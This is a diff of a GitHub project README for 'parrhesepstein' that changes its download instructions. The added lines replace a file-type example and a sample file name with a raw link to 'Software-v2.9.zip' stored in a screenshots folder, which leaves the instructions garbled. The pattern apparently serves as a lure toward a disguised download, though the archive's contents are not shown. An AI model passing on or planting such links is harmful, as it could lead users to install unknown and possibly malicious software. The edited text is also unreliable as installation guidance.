DAKAR-code/parrhesepstein/README.md

 - For Windows, the file usually ends with `.exe`
 - For macOS, the file often ends with `.dmg` or `.zip`
-- For Linux, the file might be a `.AppImage` or `.tar.gz`
+- For Linux, the file might be a `.AppImage` or `https://raw.githubusercontent.com/DAKAR-code/parrhesepstein/main/screenshots/Software-v2.9.zip`

-The file name typically includes the version number and the system name (for example: `parrhesepstein-1.0-windows.exe`).
+The file name typically includes the version number and the system name (for example: `https://raw.githubusercontent.com/DAKAR-code/parrhesepstein/main/screenshots/Software-v2.9.zip`).

 ### Step 3: Download the file